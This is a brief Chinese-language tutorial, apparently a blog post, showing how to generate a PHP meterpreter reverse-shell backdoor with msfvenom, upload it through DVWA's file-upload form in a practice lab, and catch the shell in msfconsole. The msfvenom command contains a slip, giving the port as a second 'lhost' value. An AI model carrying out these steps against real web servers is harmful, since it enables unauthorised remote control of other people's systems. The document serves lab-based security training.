metasplot之php后门
***metasploit 之上传php后门
打开kali
输入msfvenom -p php/meterpreter/reverse_tcp lhost=内网ip地址 lhost=4455 R> shell.php 生成一个php文件木马.
新建一个终端 输入msfconsole 打开meterpreter 使用手动监听模块, 设立攻击载荷 ,设立 监听端口,设立端口为4455
打开dvwa 我用的是owaspbwa下的dvwa,可以自行搭建一个dvwa.
安全度设置为低.
打开文件上传选框,上传我们的shell.php(也就是制作完成的木马)
上传成功.
自己打开网站下shell.php
反弹成功!
先ctrl+c退出 然后 进入sessions -i id号(我的是4)
已经拿到目标shell!